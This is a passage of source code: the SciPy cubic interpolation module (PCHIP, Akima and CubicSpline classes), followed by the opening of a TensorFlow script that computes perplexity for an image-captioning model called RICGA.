        x, dx, y, axis, dydx = prepare_input(x, y, axis, dydx)
        # Reshape dx so it broadcasts across the trailing dimensions of y.
        dx_b = dx.reshape([dx.shape[0]] + [1] * (y.ndim - 1))
        secant = np.diff(y, axis=0) / dx_b
        # Combined deviation of the endpoint derivatives from the secant
        # slope; this determines the cubic and quadratic coefficients.
        dev = (dydx[:-1] + dydx[1:] - 2 * secant) / dx_b
        coeffs = np.empty((4, len(x) - 1) + y.shape[1:], dtype=dev.dtype)
        coeffs[0] = dev / dx_b                          # cubic term
        coeffs[1] = (secant - dydx[:-1]) / dx_b - dev   # quadratic term
        coeffs[2] = dydx[:-1]                           # linear term
        coeffs[3] = y[:-1]                              # constant term
        super().__init__(coeffs, x, extrapolate=extrapolate)
        self.axis = axis
class PchipInterpolator(CubicHermiteSpline):
    r"""PCHIP 1-D monotonic cubic interpolation.
    ``x`` and ``y`` are arrays of values used to approximate some function f,
    with ``y = f(x)``. The interpolant uses monotonic cubic splines
    to find the value of new points. (PCHIP stands for Piecewise Cubic
    Hermite Interpolating Polynomial).
    Parameters
    ----------
    x : ndarray
        A 1-D array of monotonically increasing real values. ``x`` cannot
        include duplicate values (otherwise f is overspecified)
    y : ndarray
        A 1-D array of real values. ``y``'s length along the interpolation
        axis must be equal to the length of ``x``. If N-D array, use ``axis``
        parameter to select correct axis.
    axis : int, optional
        Axis in the y array corresponding to the x-coordinate values.
    extrapolate : bool, optional
        Whether to extrapolate to out-of-bounds points based on first
        and last intervals, or to return NaNs.
    Methods
    -------
    __call__
    derivative
    antiderivative
    roots
    See Also
    --------
    CubicHermiteSpline : Piecewise-cubic interpolator.
    Akima1DInterpolator : Akima 1D interpolator.
    CubicSpline : Cubic spline data interpolator.
    PPoly : Piecewise polynomial in terms of coefficients and breakpoints.
    Notes
    -----
    The interpolator preserves monotonicity in the interpolation data and does
    not overshoot if the data is not smooth.
    The first derivatives are guaranteed to be continuous, but the second
    derivatives may jump at :math:`x_k`.
    Determines the derivatives at the points :math:`x_k`, :math:`f'_k`,
    by using PCHIP algorithm [1]_.
    Let :math:`h_k = x_{k+1} - x_k`, and :math:`d_k = (y_{k+1} - y_k) / h_k`
    are the slopes at internal points :math:`x_k`.
    If the signs of :math:`d_k` and :math:`d_{k-1}` are different or either of
    them equals zero, then :math:`f'_k = 0`. Otherwise, it is given by the
    weighted harmonic mean
    .. math::
        \frac{w_1 + w_2}{f'_k} = \frac{w_1}{d_{k-1}} + \frac{w_2}{d_k}
    where :math:`w_1 = 2 h_k + h_{k-1}` and :math:`w_2 = h_k + 2 h_{k-1}`.
    The end slopes are set using a one-sided scheme [2]_.
    References
    ----------
    .. [1] F. N. Fritsch and J. Butland,
           A method for constructing local
           monotone piecewise cubic interpolants,
           SIAM J. Sci. Comput., 5(2), 300-304 (1984).
           :doi:`10.1137/0905021`.
    .. [2] see, e.g., C. Moler, Numerical Computing with Matlab, 2004.
           :doi:`10.1137/1.9780898717952`
    """
    def __init__(self, x, y, axis=0, extrapolate=None):
        x, _, y, axis, _ = prepare_input(x, y, axis)
        # Column view of x that broadcasts against the trailing dims of y,
        # so _find_derivatives can compute slopes for N-D `y` in one shot.
        xp = x.reshape((x.shape[0],) + (1,)*(y.ndim-1))
        dk = self._find_derivatives(xp, y)
        # prepare_input already moved the interpolation axis to position 0,
        # hence axis=0 here; the user-facing axis is restored below.
        super().__init__(x, y, dk, axis=0, extrapolate=extrapolate)
        self.axis = axis
    @staticmethod
    def _edge_case(h0, h1, m0, m1):
        # End-slope estimate from the two spacings (h0, h1) and the two
        # secant slopes (m0, m1) adjacent to the boundary.
        # one-sided three-point estimate for the derivative
        d = ((2*h0 + h1)*m0 - h0*m1) / (h0 + h1)
        # try to preserve shape
        # Zero the derivative where it disagrees in sign with the nearest
        # secant slope (would break monotonicity) ...
        mask = np.sign(d) != np.sign(m0)
        # ... and clamp to 3*m0 where the estimate overshoots near a local
        # extremum (secants change sign).
        mask2 = (np.sign(m0) != np.sign(m1)) & (np.abs(d) > 3.*np.abs(m0))
        mmm = (~mask) & mask2
        d[mask] = 0.
        d[mmm] = 3.*m0[mmm]
        return d
    @staticmethod
    def _find_derivatives(x, y):
        # Determine the derivatives at the points y_k, d_k, by using
        # PCHIP algorithm is:
        # We choose the derivatives at the point x_k by
        # Let m_k be the slope of the kth segment (between k and k+1)
        # If m_k=0 or m_{k-1}=0 or sgn(m_k) != sgn(m_{k-1}) then d_k == 0
        # else use weighted harmonic mean:
        # w_1 = 2h_k + h_{k-1}, w_2 = h_k + 2h_{k-1}
        # 1/d_k = 1/(w_1 + w_2)*(w_1 / m_k + w_2 / m_{k-1})
        # where h_k is the spacing between x_k and x_{k+1}
        y_shape = y.shape
        if y.ndim == 1:
            # So that _edge_case doesn't end up assigning to scalars
            x = x[:, None]
            y = y[:, None]
        hk = x[1:] - x[:-1]
        mk = (y[1:] - y[:-1]) / hk
        if y.shape[0] == 2:
            # edge case: only have two points, use linear interpolation
            dk = np.zeros_like(y)
            dk[0] = mk
            dk[1] = mk
            return dk.reshape(y_shape)
        smk = np.sign(mk)
        # Interior points where the derivative must be zero: the secant
        # slopes on either side differ in sign or one of them vanishes.
        condition = (smk[1:] != smk[:-1]) | (mk[1:] == 0) | (mk[:-1] == 0)
        w1 = 2*hk[1:] + hk[:-1]
        w2 = hk[1:] + 2*hk[:-1]
        # values where division by zero occurs will be excluded
        # by 'condition' afterwards
        with np.errstate(divide='ignore'):
            whmean = (w1/mk[:-1] + w2/mk[1:]) / (w1 + w2)
        dk = np.zeros_like(y)
        dk[1:-1][condition] = 0.0
        dk[1:-1][~condition] = 1.0 / whmean[~condition]
        # special case endpoints, as suggested in
        # Cleve Moler, Numerical Computing with MATLAB, Chap 3.6 (pchiptx.m)
        dk[0] = PchipInterpolator._edge_case(hk[0], hk[1], mk[0], mk[1])
        dk[-1] = PchipInterpolator._edge_case(hk[-1], hk[-2], mk[-1], mk[-2])
        return dk.reshape(y_shape)
def pchip_interpolate(xi, yi, x, der=0, axis=0):
    """Convenience wrapper around `PchipInterpolator`.

    Builds a PCHIP (monotonic piecewise cubic) interpolant through
    ``(xi, yi)`` and evaluates it, or its derivatives, at `x`.
    See `scipy.interpolate.PchipInterpolator` for details.

    Parameters
    ----------
    xi : array_like
        A sorted list of x-coordinates, of length N.
    yi : array_like
        Values at `xi`; the length along the interpolation axis must equal
        the length of `xi`. For an N-D array, select the axis with `axis`.
    x : scalar or array_like
        Points at which to evaluate, of length M.
    der : int or list, optional
        Derivative order(s) to evaluate. Order 0 returns the function
        value itself; a list returns one result per requested order.
    axis : int, optional
        Axis of `yi` corresponding to the x-coordinate values.

    Returns
    -------
    y : scalar or array_like
        The result, of length R or length M or M by R.

    See Also
    --------
    PchipInterpolator : PCHIP 1-D monotonic cubic interpolator.
    """
    interpolant = PchipInterpolator(xi, yi, axis=axis)
    if der == 0:
        return interpolant(x)
    if _isscalar(der):
        return interpolant.derivative(der)(x)
    return [interpolant.derivative(order)(x) for order in der]
class Akima1DInterpolator(CubicHermiteSpline):
    """
    Akima interpolator
    Fit piecewise cubic polynomials, given vectors x and y. The interpolation
    method by Akima uses a continuously differentiable sub-spline built from
    piecewise cubic polynomials. The resultant curve passes through the given
    data points and will appear smooth and natural.
    Parameters
    ----------
    x : ndarray, shape (m, )
        1-D array of monotonically increasing real values.
    y : ndarray, shape (m, ...)
        N-D array of real values. The length of ``y`` along the first axis
        must be equal to the length of ``x``.
    axis : int, optional
        Specifies the axis of ``y`` along which to interpolate. Interpolation
        defaults to the first axis of ``y``.
    Methods
    -------
    __call__
    derivative
    antiderivative
    roots
    See Also
    --------
    PchipInterpolator : PCHIP 1-D monotonic cubic interpolator.
    CubicSpline : Cubic spline data interpolator.
    PPoly : Piecewise polynomial in terms of coefficients and breakpoints
    Notes
    -----
    .. versionadded:: 0.14
    Use only for precise data, as the fitted curve passes through the given
    points exactly. This routine is useful for plotting a pleasingly smooth
    curve through a few given points for purposes of plotting.
    References
    ----------
    [1] A new method of interpolation and smooth curve fitting based
        on local procedures. Hiroshi Akima, J. ACM, October 1970, 17(4),
        589-602.
    """
    def __init__(self, x, y, axis=0):
        # Original implementation in MATLAB by N. Shamsundar (BSD licensed), see
        # https://www.mathworks.com/matlabcentral/fileexchange/1814-akima-interpolation
        x, dx, y, axis, _ = prepare_input(x, y, axis)
        # determine slopes between breakpoints
        # m holds the n-1 data slopes in m[2:-2], plus two extrapolated
        # "ghost" slopes at each end so every breakpoint has four
        # neighboring slopes available for Akima's weighting rule.
        m = np.empty((x.size + 3, ) + y.shape[1:])
        dx = dx[(slice(None), ) + (None, ) * (y.ndim - 1)]
        m[2:-2] = np.diff(y, axis=0) / dx
        # add two additional points on the left ...
        m[1] = 2. * m[2] - m[3]
        m[0] = 2. * m[1] - m[2]
        # ... and on the right
        m[-2] = 2. * m[-3] - m[-4]
        m[-1] = 2. * m[-2] - m[-3]
        # if m1 == m2 != m3 == m4, the slope at the breakpoint is not defined.
        # This is the fill value:
        t = .5 * (m[3:] + m[:-3])
        # get the denominator of the slope t
        dm = np.abs(np.diff(m, axis=0))
        f1 = dm[2:]
        f2 = dm[:-2]
        f12 = f1 + f2
        # These are the mask of where the the slope at breakpoint is defined:
        # (relative threshold avoids division by a near-zero denominator)
        ind = np.nonzero(f12 > 1e-9 * np.max(f12))
        x_ind, y_ind = ind[0], ind[1:]
        # Set the slope at breakpoint
        t[ind] = (f1[ind] * m[(x_ind + 1,) + y_ind] +
                  f2[ind] * m[(x_ind + 2,) + y_ind]) / f12[ind]
        # prepare_input already moved the interpolation axis to position 0,
        # hence axis=0 here; the user-facing axis is restored below.
        super().__init__(x, y, t, axis=0, extrapolate=False)
        self.axis = axis
    def extend(self, c, x, right=True):
        raise NotImplementedError("Extending a 1-D Akima interpolator is not "
                                  "yet implemented")
    # These are inherited from PPoly, but they do not produce an Akima
    # interpolator. Hence stub them out.
    @classmethod
    def from_spline(cls, tck, extrapolate=None):
        raise NotImplementedError("This method does not make sense for "
                                  "an Akima interpolator.")
    @classmethod
    def from_bernstein_basis(cls, bp, extrapolate=None):
        raise NotImplementedError("This method does not make sense for "
                                  "an Akima interpolator.")
class CubicSpline(CubicHermiteSpline):
    """Cubic spline data interpolator.
    Interpolate data with a piecewise cubic polynomial which is twice
    continuously differentiable [1]_. The result is represented as a `PPoly`
    instance with breakpoints matching the given data.
    Parameters
    ----------
    x : array_like, shape (n,)
        1-D array containing values of the independent variable.
        Values must be real, finite and in strictly increasing order.
    y : array_like
        Array containing values of the dependent variable. It can have
        arbitrary number of dimensions, but the length along ``axis``
        (see below) must match the length of ``x``. Values must be finite.
    axis : int, optional
        Axis along which `y` is assumed to be varying. Meaning that for
        ``x[i]`` the corresponding values are ``np.take(y, i, axis=axis)``.
        Default is 0.
    bc_type : string or 2-tuple, optional
        Boundary condition type. Two additional equations, given by the
        boundary conditions, are required to determine all coefficients of
        polynomials on each segment [2]_.
        If `bc_type` is a string, then the specified condition will be applied
        at both ends of a spline. Available conditions are:
        * 'not-a-knot' (default): The first and second segment at a curve end
          are the same polynomial. It is a good default when there is no
          information on boundary conditions.
        * 'periodic': The interpolated functions is assumed to be periodic
          of period ``x[-1] - x[0]``. The first and last value of `y` must be
          identical: ``y[0] == y[-1]``. This boundary condition will result in
          ``y'[0] == y'[-1]`` and ``y''[0] == y''[-1]``.
        * 'clamped': The first derivative at curves ends are zero. Assuming
          a 1D `y`, ``bc_type=((1, 0.0), (1, 0.0))`` is the same condition.
        * 'natural': The second derivative at curve ends are zero. Assuming
          a 1D `y`, ``bc_type=((2, 0.0), (2, 0.0))`` is the same condition.
        If `bc_type` is a 2-tuple, the first and the second value will be
        applied at the curve start and end respectively. The tuple values can
        be one of the previously mentioned strings (except 'periodic') or a
        tuple `(order, deriv_values)` allowing to specify arbitrary
        derivatives at curve ends:
        * `order`: the derivative order, 1 or 2.
        * `deriv_value`: array_like containing derivative values, shape must
          be the same as `y`, excluding ``axis`` dimension. For example, if
          `y` is 1-D, then `deriv_value` must be a scalar. If `y` is 3-D with
          the shape (n0, n1, n2) and axis=2, then `deriv_value` must be 2-D
          and have the shape (n0, n1).
    extrapolate : {bool, 'periodic', None}, optional
        If bool, determines whether to extrapolate to out-of-bounds points
        based on first and last intervals, or to return NaNs. If 'periodic',
        periodic extrapolation is used. If None (default), ``extrapolate`` is
        set to 'periodic' for ``bc_type='periodic'`` and to True otherwise.
    Attributes
    ----------
    x : ndarray, shape (n,)
        Breakpoints. The same ``x`` which was passed to the constructor.
    c : ndarray, shape (4, n-1, ...)
        Coefficients of the polynomials on each segment. The trailing
        dimensions match the dimensions of `y`, excluding ``axis``.
        For example, if `y` is 1-d, then ``c[k, i]`` is a coefficient for
        ``(x-x[i])**(3-k)`` on the segment between ``x[i]`` and ``x[i+1]``.
    axis : int
        Interpolation axis. The same axis which was passed to the
        constructor.
    Methods
    -------
    __call__
    derivative
    antiderivative
    integrate
    roots
    See Also
    --------
    Akima1DInterpolator : Akima 1D interpolator.
    PchipInterpolator : PCHIP 1-D monotonic cubic interpolator.
    PPoly : Piecewise polynomial in terms of coefficients and breakpoints.
    Notes
    -----
    Parameters `bc_type` and ``interpolate`` work independently, i.e. the
    former controls only construction of a spline, and the latter only
    evaluation.
    When a boundary condition is 'not-a-knot' and n = 2, it is replaced by
    a condition that the first derivative is equal to the linear interpolant
    slope. When both boundary conditions are 'not-a-knot' and n = 3, the
    solution is sought as a parabola passing through given points.
    When 'not-a-knot' boundary conditions is applied to both ends, the
    resulting spline will be the same as returned by `splrep` (with ``s=0``)
    and `InterpolatedUnivariateSpline`, but these two methods use a
    representation in B-spline basis.
    .. versionadded:: 0.18.0
    Examples
    --------
    In this example the cubic spline is used to interpolate a sampled sinusoid.
    You can see that the spline continuity property holds for the first and
    second derivatives and violates only for the third derivative.
    >>> from scipy.interpolate import CubicSpline
    >>> import matplotlib.pyplot as plt
    >>> x = np.arange(10)
    >>> y = np.sin(x)
    >>> cs = CubicSpline(x, y)
    >>> xs = np.arange(-0.5, 9.6, 0.1)
    >>> fig, ax = plt.subplots(figsize=(6.5, 4))
    >>> ax.plot(x, y, 'o', label='data')
    >>> ax.plot(xs, np.sin(xs), label='true')
    >>> ax.plot(xs, cs(xs), label="S")
    >>> ax.plot(xs, cs(xs, 1), label="S'")
    >>> ax.plot(xs, cs(xs, 2), label="S''")
    >>> ax.plot(xs, cs(xs, 3), label="S'''")
    >>> ax.set_xlim(-0.5, 9.5)
    >>> ax.legend(loc='lower left', ncol=2)
    >>> plt.show()
    In the second example, the unit circle is interpolated with a spline. A
    periodic boundary condition is used. You can see that the first derivative
    values, ds/dx=0, ds/dy=1 at the periodic point (1, 0) are correctly
    computed. Note that a circle cannot be exactly represented by a cubic
    spline. To increase precision, more breakpoints would be required.
    >>> theta = 2 * np.pi * np.linspace(0, 1, 5)
    >>> y = np.c_[np.cos(theta), np.sin(theta)]
    >>> cs = CubicSpline(theta, y, bc_type='periodic')
    >>> print("ds/dx={:.1f} ds/dy={:.1f}".format(cs(0, 1)[0], cs(0, 1)[1]))
    ds/dx=0.0 ds/dy=1.0
    >>> xs = 2 * np.pi * np.linspace(0, 1, 100)
    >>> fig, ax = plt.subplots(figsize=(6.5, 4))
    >>> ax.plot(y[:, 0], y[:, 1], 'o', label='data')
    >>> ax.plot(np.cos(xs), np.sin(xs), label='true')
    >>> ax.plot(cs(xs)[:, 0], cs(xs)[:, 1], label='spline')
    >>> ax.axes.set_aspect('equal')
    >>> ax.legend(loc='center')
    >>> plt.show()
    The third example is the interpolation of a polynomial y = x**3 on the
    interval 0 <= x<= 1. A cubic spline can represent this function exactly.
    To achieve that we need to specify values and first derivatives at
    endpoints of the interval. Note that y' = 3 * x**2 and thus y'(0) = 0 and
    y'(1) = 3.
    >>> cs = CubicSpline([0, 1], [0, 1], bc_type=((1, 0), (1, 3)))
    >>> x = np.linspace(0, 1)
    >>> np.allclose(x**3, cs(x))
    True
    References
    ----------
    .. [1] `Cubic Spline Interpolation
           <https://en.wikiversity.org/wiki/Cubic_Spline_Interpolation>`_
           on Wikiversity.
    .. [2] Carl de Boor, "A Practical Guide to Splines", Springer-Verlag, 1978.
    """
    def __init__(self, x, y, axis=0, bc_type='not-a-knot', extrapolate=None):
        x, dx, y, axis, _ = prepare_input(x, y, axis)
        n = len(x)
        bc, y = self._validate_bc(bc_type, y, y.shape[1:], axis)
        if extrapolate is None:
            if bc[0] == 'periodic':
                extrapolate = 'periodic'
            else:
                extrapolate = True
        # dxr broadcasts dx over the trailing dimensions of y.
        dxr = dx.reshape([dx.shape[0]] + [1] * (y.ndim - 1))
        slope = np.diff(y, axis=0) / dxr
        # If bc is 'not-a-knot' this change is just a convention.
        # If bc is 'periodic' then we already checked that y[0] == y[-1],
        # and the spline is just a constant, we handle this case in the same
        # way by setting the first derivatives to slope, which is 0.
        if n == 2:
            if bc[0] in ['not-a-knot', 'periodic']:
                bc[0] = (1, slope[0])
            if bc[1] in ['not-a-knot', 'periodic']:
                bc[1] = (1, slope[0])
        # This is a very special case, when both conditions are 'not-a-knot'
        # and n == 3. In this case 'not-a-knot' can't be handled regularly
        # as the both conditions are identical. We handle this case by
        # constructing a parabola passing through given points.
        if n == 3 and bc[0] == 'not-a-knot' and bc[1] == 'not-a-knot':
            A = np.zeros((3, 3))  # This is a standard matrix.
            b = np.empty((3,) + y.shape[1:], dtype=y.dtype)
            A[0, 0] = 1
            A[0, 1] = 1
            A[1, 0] = dx[1]
            A[1, 1] = 2 * (dx[0] + dx[1])
            A[1, 2] = dx[0]
            A[2, 1] = 1
            A[2, 2] = 1
            b[0] = 2 * slope[0]
            b[1] = 3 * (dxr[0] * slope[1] + dxr[1] * slope[0])
            b[2] = 2 * slope[1]
            s = solve(A, b, overwrite_a=True, overwrite_b=True,
                      check_finite=False)
        elif n == 3 and bc[0] == 'periodic':
            # In case when number of points is 3 we should count derivatives
            # manually
            s = np.empty((n,) + y.shape[1:], dtype=y.dtype)
            # Weighted average of the two slopes; the single derivative value
            # shared by all three points of a periodic 3-point spline.
            t = (slope / dxr).sum() / (1. / dxr).sum()
            s.fill(t)
        else:
            # Find derivative values at each x[i] by solving a tridiagonal
            # system.
            A = np.zeros((3, n))  # This is a banded matrix representation.
            b = np.empty((n,) + y.shape[1:], dtype=y.dtype)
            # Filling the system for i=1..n-2
            #                         (x[i-1] - x[i]) * s[i-1] +\
            # 2 * ((x[i] - x[i-1]) + (x[i+1] - x[i])) * s[i]   +\
            #                         (x[i] - x[i-1]) * s[i+1] =\
            #       3 * ((x[i+1] - x[i])*(y[i] - y[i-1])/(x[i] - x[i-1]) +\
            #           (x[i] - x[i-1])*(y[i+1] - y[i])/(x[i+1] - x[i]))
            A[1, 1:-1] = 2 * (dx[:-1] + dx[1:])  # The diagonal
            A[0, 2:] = dx[:-1]                   # The upper diagonal
            A[-1, :-2] = dx[1:]                  # The lower diagonal
            b[1:-1] = 3 * (dxr[1:] * slope[:-1] + dxr[:-1] * slope[1:])
            bc_start, bc_end = bc
            if bc_start == 'periodic':
                # Due to the periodicity, and because y[-1] = y[0], the linear
                # system has (n-1) unknowns/equations instead of n:
                A = A[:, 0:-1]
                A[1, 0] = 2 * (dx[-1] + dx[0])
                A[0, 1] = dx[-1]
                b = b[:-1]
                # Also, due to the periodicity, the system is not tri-diagonal.
                # We need to compute a "condensed" matrix of shape (n-2, n-2).
                # See https://web.archive.org/web/20151220180652/http://www.cfm.brown.edu/people/gk/chap6/node14.html
                # for more explanations.
                # The condensed matrix is obtained by removing the last column
                # and last row of the (n-1, n-1) system matrix. The removed
                # values are saved in scalar variables with the (n-1, n-1)
                # system matrix indices forming their names:
                a_m1_0 = dx[-2]  # lower left corner value: A[-1, 0]
                a_m1_m2 = dx[-1]
                a_m1_m1 = 2 * (dx[-1] + dx[-2])
                a_m2_m1 = dx[-3]
                a_0_m1 = dx[0]
                b[0] = 3 * (dxr[0] * slope[-1] + dxr[-1] * slope[0])
                b[-1] = 3 * (dxr[-1] * slope[-2] + dxr[-2] * slope[-1])
                Ac = A[:, :-1]
                b1 = b[:-1]
                b2 = np.zeros_like(b1)
                b2[0] = -a_0_m1
                b2[-1] = -a_m2_m1
                # s1 and s2 are the solutions of (n-2, n-2) system
                s1 = solve_banded((1, 1), Ac, b1, overwrite_ab=False,
                                  overwrite_b=False, check_finite=False)
                s2 = solve_banded((1, 1), Ac, b2, overwrite_ab=False,
                                  overwrite_b=False, check_finite=False)
                # computing the s[n-2] solution:
                s_m1 = ((b[-1] - a_m1_0 * s1[0] - a_m1_m2 * s1[-1]) /
                        (a_m1_m1 + a_m1_0 * s2[0] + a_m1_m2 * s2[-1]))
                # s is the solution of the (n, n) system:
                s = np.empty((n,) + y.shape[1:], dtype=y.dtype)
                s[:-2] = s1 + s_m1 * s2
                s[-2] = s_m1
                # Periodicity: the derivative at the last point equals the
                # derivative at the first point.
                s[-1] = s[0]
            else:
                # First row of the system encodes the start boundary condition.
                if bc_start == 'not-a-knot':
                    A[1, 0] = dx[1]
                    A[0, 1] = x[2] - x[0]
                    d = x[2] - x[0]
                    b[0] = ((dxr[0] + 2*d) * dxr[1] * slope[0] +
                            dxr[0]**2 * slope[1]) / d
                elif bc_start[0] == 1:
                    A[1, 0] = 1
                    A[0, 1] = 0
                    b[0] = bc_start[1]
                elif bc_start[0] == 2:
                    A[1, 0] = 2 * dx[0]
                    A[0, 1] = dx[0]
                    b[0] = -0.5 * bc_start[1] * dx[0]**2 + 3 * (y[1] - y[0])
                # Last row of the system encodes the end boundary condition.
                if bc_end == 'not-a-knot':
                    A[1, -1] = dx[-2]
                    A[-1, -2] = x[-1] - x[-3]
                    d = x[-1] - x[-3]
                    b[-1] = ((dxr[-1]**2*slope[-2] +
                             (2*d + dxr[-1])*dxr[-2]*slope[-1]) / d)
                elif bc_end[0] == 1:
                    A[1, -1] = 1
                    A[-1, -2] = 0
                    b[-1] = bc_end[1]
                elif bc_end[0] == 2:
                    A[1, -1] = 2 * dx[-1]
                    A[-1, -2] = dx[-1]
                    b[-1] = 0.5 * bc_end[1] * dx[-1]**2 + 3 * (y[-1] - y[-2])
                s = solve_banded((1, 1), A, b, overwrite_ab=True,
                                 overwrite_b=True, check_finite=False)
        # prepare_input already moved the interpolation axis to position 0,
        # hence axis=0 here; the user-facing axis is restored below.
        super().__init__(x, y, s, axis=0, extrapolate=extrapolate)
        self.axis = axis
    @staticmethod
    def _validate_bc(bc_type, y, expected_deriv_shape, axis):
        """Validate and prepare boundary conditions.
        Returns
        -------
        validated_bc : 2-tuple
            Boundary conditions for a curve start and end.
        y : ndarray
            y casted to complex dtype if one of the boundary conditions has
            complex dtype.
        """
        if isinstance(bc_type, str):
            if bc_type == 'periodic':
                if not np.allclose(y[0], y[-1], rtol=1e-15, atol=1e-15):
                    raise ValueError(
                        "The first and last `y` point along axis {} must "
                        "be identical (within machine precision) when "
                        "bc_type='periodic'.".format(axis))
            # A single string applies to both curve ends.
            bc_type = (bc_type, bc_type)
        else:
            if len(bc_type) != 2:
                raise ValueError("`bc_type` must contain 2 elements to "
                                 "specify start and end conditions.")
            if 'periodic' in bc_type:
                raise ValueError("'periodic' `bc_type` is defined for both "
                                 "curve ends and cannot be used with other "
                                 "boundary conditions.")
        validated_bc = []
        for bc in bc_type:
            if isinstance(bc, str):
                if bc == 'clamped':
                    validated_bc.append((1, np.zeros(expected_deriv_shape)))
                elif bc == 'natural':
                    validated_bc.append((2, np.zeros(expected_deriv_shape)))
                elif bc in ['not-a-knot', 'periodic']:
                    validated_bc.append(bc)
                else:
                    raise ValueError("bc_type={} is not allowed.".format(bc))
            else:
                try:
                    deriv_order, deriv_value = bc
                except Exception as e:
                    raise ValueError(
                        "A specified derivative value must be "
                        "given in the form (order, value)."
                    ) from e
                if deriv_order not in [1, 2]:
                    raise ValueError("The specified derivative order must "
                                     "be 1 or 2.")
                deriv_value = np.asarray(deriv_value)
                if deriv_value.shape != expected_deriv_shape:
                    raise ValueError(
                        "`deriv_value` shape {} is not the expected one {}."
                        .format(deriv_value.shape, expected_deriv_shape))
                # A complex derivative forces the whole spline to be complex.
                if np.issubdtype(deriv_value.dtype, np.complexfloating):
                    y = y.astype(complex, copy=False)
                validated_bc.append((deriv_order, deriv_value))
        return validated_bc, y
| WarrenWeckesser/scipy | scipy/interpolate/_cubic.py | Python | bsd-3-clause | 33,069 |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Evaluate the model.
This script should be run concurrently with training so that summaries show up
in TensorBoard.
If you want to run the script without GPU, you should define CUDA_VISIBLE_DEVICES="" before running the code.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import os.path
import time
import numpy as np
import tensorflow as tf
from ricga import configuration
from ricga import ricga_model
# Global container through which the flag values defined below are read.
FLAGS = tf.flags.FLAGS
# NOTE(review): the default values below are machine-specific absolute paths;
# presumably they must be overridden on the command line elsewhere -- confirm.
tf.flags.DEFINE_string("input_file_pattern", "/home/meteorshub/code/RICGA/ricga/data/mscoco/val-?????-of-00004",
                       "File pattern of sharded TFRecord input files.")
tf.flags.DEFINE_string("checkpoint_dir", "/home/meteorshub/code/RICGA/ricga/model/train",
                       "Directory containing model checkpoints.")
tf.flags.DEFINE_string("eval_dir", "/home/meteorshub/code/RICGA/ricga/model/eval", "Directory to write event logs.")
tf.flags.DEFINE_integer("eval_interval_secs", 600,
                        "Interval between evaluation runs.")
tf.flags.DEFINE_integer("num_eval_examples", 10132,
                        "Number of examples for evaluation.")
tf.flags.DEFINE_integer("min_global_step", 100,
                        "Minimum global step to run evaluation.")
# Emit INFO-level log messages so evaluation progress is visible.
tf.logging.set_verbosity(tf.logging.INFO)
def evaluate_model(sess, model, global_step, summary_writer, summary_op):
  """Computes perplexity-per-word over the evaluation dataset.

  Summaries and perplexity-per-word are written out to the eval directory.

  Args:
    sess: Session object.
    model: Instance of RicgaModel; the model to evaluate.
    global_step: Integer; global step of the model checkpoint.
    summary_writer: Instance of FileWriter.
    summary_op: Op for generating model summaries.
  """
  # Log model summaries on a single batch.
  summary_str = sess.run(summary_op)
  summary_writer.add_summary(summary_str, global_step)
  # Compute perplexity over the entire dataset.
  num_eval_batches = int(
      math.ceil(FLAGS.num_eval_examples / model.config.batch_size))
  start_time = time.time()
  sum_losses = 0.
  sum_weights = 0.
  # `range` instead of the Python-2-only `xrange`: this module already
  # imports from __future__ for Python 3 compatibility, and `xrange` would
  # raise NameError there.
  for i in range(num_eval_batches):
    cross_entropy_losses, weights = sess.run([
        model.target_cross_entropy_losses,
        model.target_cross_entropy_loss_weights
    ])
    sum_losses += np.sum(cross_entropy_losses * weights)
    sum_weights += np.sum(weights)
    if not i % 100:
      tf.logging.info("Computed losses for %d of %d batches.", i + 1,
                      num_eval_batches)
  eval_time = time.time() - start_time
  # Perplexity is exp of the weighted mean per-word cross-entropy.
  perplexity = math.exp(sum_losses / sum_weights)
  tf.logging.info("Perplexity = %f (%.2g sec)", perplexity, eval_time)
  # Log perplexity to the FileWriter.
  summary = tf.Summary()
  value = summary.value.add()
  value.simple_value = perplexity
  value.tag = "Perplexity"
  summary_writer.add_summary(summary, global_step)
  # Write the Events file to the eval directory.
  summary_writer.flush()
  tf.logging.info("Finished processing evaluation at global step %d.",
                  global_step)
def run_once(model, saver, summary_writer, summary_op):
  """Evaluates the latest model checkpoint.

  Args:
    model: Instance of RicgaModel; the model to evaluate.
    saver: Instance of tf.train.Saver for restoring model Variables.
    summary_writer: Instance of FileWriter.
    summary_op: Op for generating model summaries.
  """
  model_path = tf.train.latest_checkpoint(FLAGS.checkpoint_dir)
  if not model_path:
    tf.logging.info("Skipping evaluation. No checkpoint found in: %s",
                    FLAGS.checkpoint_dir)
    return
  with tf.Session() as sess:
    # Load model from checkpoint.
    tf.logging.info("Loading model from checkpoint: %s", model_path)
    saver.restore(sess, model_path)
    global_step = tf.train.global_step(sess, model.global_step.name)
    tf.logging.info("Successfully loaded %s at global step = %d.",
                    os.path.basename(model_path), global_step)
    if global_step < FLAGS.min_global_step:
      tf.logging.info("Skipping evaluation. Global step = %d < %d", global_step,
                      FLAGS.min_global_step)
      return
    # Start the queue runners that feed the evaluation input pipeline.
    coord = tf.train.Coordinator()
    threads = tf.train.start_queue_runners(coord=coord)
    # Run evaluation on the latest checkpoint.
    try:
      evaluate_model(
          sess=sess,
          model=model,
          global_step=global_step,
          summary_writer=summary_writer,
          summary_op=summary_op)
    except Exception as e:  # pylint: disable=broad-except
      # `except Exception as e`: the original `except Exception, e` form is
      # a SyntaxError on Python 3. The broad catch is deliberate -- any
      # evaluation failure is forwarded to the coordinator for shutdown.
      tf.logging.error("Evaluation failed.")
      coord.request_stop(e)
    coord.request_stop()
    coord.join(threads, stop_grace_period_secs=10)
def run():
  """Runs evaluation in a loop, and logs summaries to TensorBoard."""
  # Make sure the directory for event files exists.
  eval_dir = FLAGS.eval_dir
  if not tf.gfile.IsDirectory(eval_dir):
    tf.logging.info("Creating eval directory: %s", eval_dir)
    tf.gfile.MakeDirs(eval_dir)
  graph = tf.Graph()
  with graph.as_default():
    # Build the model in evaluation mode.
    model_config = configuration.ModelConfig()
    model_config.input_file_pattern = FLAGS.input_file_pattern
    model = ricga_model.RicgaModel(model_config, mode="eval")
    model.build()
    # Saver restores model variables from the latest checkpoint.
